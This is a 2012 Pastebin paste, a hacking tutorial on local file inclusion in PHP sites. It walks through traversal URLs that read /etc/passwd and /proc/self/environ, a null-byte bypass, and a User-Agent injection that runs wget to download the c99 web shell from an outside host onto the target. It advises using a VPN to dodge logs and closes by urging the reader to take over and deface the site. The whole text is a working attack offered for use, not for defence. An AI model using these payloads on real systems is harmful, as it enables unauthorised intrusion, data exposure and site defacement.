API tools faq
paste
Advertisement
Topol

LFI Tutorial by Topol

Topol
Aug 29th, 2012
218
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.21 KB | None | 0 0
raw download clone embed print report
  1. Topol's LFI and Shelling through proc/self/environ Tutorial
  2. ================================================================================================
  3. Part 1 - Finding a Vulnerable site
  4.  
  5. Tip: There are several steps to finding a full vulnerable site
  6.  
  7. Say you have a site like this: www.site.com/index.php?page=view.php
  8. You can check the first vulnerability by adding a ' or a ../
  9. You should get some sort of error on the page.
  10. Now we can attempt to browse through the directory of the site by checking the /etc/passwd.
  11. So we can can replace the "view.php" of the site with /etc/passwd like this:
  12. www.site.com/index.php?page=/etc/passwd
  13. If you have the same error as before, don't worry, just keep going up the directories:
  14.  
  15. www.site.com/index.php?page=../etc/passwd
  16. www.site.com/index.php?page=../../etc/passwd
  17. www.site.com/index.php?page=../../../etc/passwd
  18. www.site.com/index.php?page=../../../../etc/passwd <-- Say we finally got it
  19.  
  20. Now we should get something like this:
  21.  
  22. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
  23. daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
  24. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
  25. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
  26. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news
  27.  
  28. (Sometimes you will have to add a null byte:
  29. www.site.com/index.php?page=../../../../etc/passwd%00)
  30. ================================================================================================
  31. Part 2 - Getting the /proc/self/environ
  32.  
  33. We now have to replace the /etc/passwd with the /proc/self/environ
  34. www.site.com/index.php?page=../../../../proc/self/environ
  35.  
  36. We should get something like this:
  37.  
  38. DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
  39. HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png,
  40. image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  41. HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
  42. HTTP_HOST=www.example.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../etc/passwd
  43. HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
  44. REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
  45. REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
  46. SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php
  47. SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@example.com
  48. SERVER_NAME=www.example.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
  49. SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
  50. mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
  51. Server at http://www.site.com Port 80
  52.  
  53. Congrats, you got the /proc/self/environ!
  54. ================================================================================================
  55. Part 3 - Shelling the site
  56.  
  57. Now that you got your /proc/self/environ,
  58. you might be able to shell it.
  59. Assuming that you use firefox, you need to download a tool called Tamper Data which is an Add-On. The link is right here: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  60. Now that you have it downloaded, you can find it in the "Tools" section of the Firefox Taskbar.
  61. So open Tamper Data on www.site.com/index.php?page=../../../../proc/self/environ and click "Start Tamper". (DO NOT GO ON ANY OTHER PAGES OR THE /proc/self/environ WONT LOAD). Now refresh the page. It is going to give you 3 options. Click "Tamper". Now in the User-Agent, you need to add your shell. For this we are going to use the c99 shell. (ALWAYS USE A PROXY/VPN, c99 LEAVES LOGS). So add this in your User-Agent:
  62.  
  63. <?system(‘wget http://www.sh3ll.org/c99.txt? -O c99.php’);?>
  64.  
  65. Now press ok. Now it should load, and you can find your shell in www.site.com/c99.php
  66. Congrats, now you can take over the site and deface it. Have fun!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!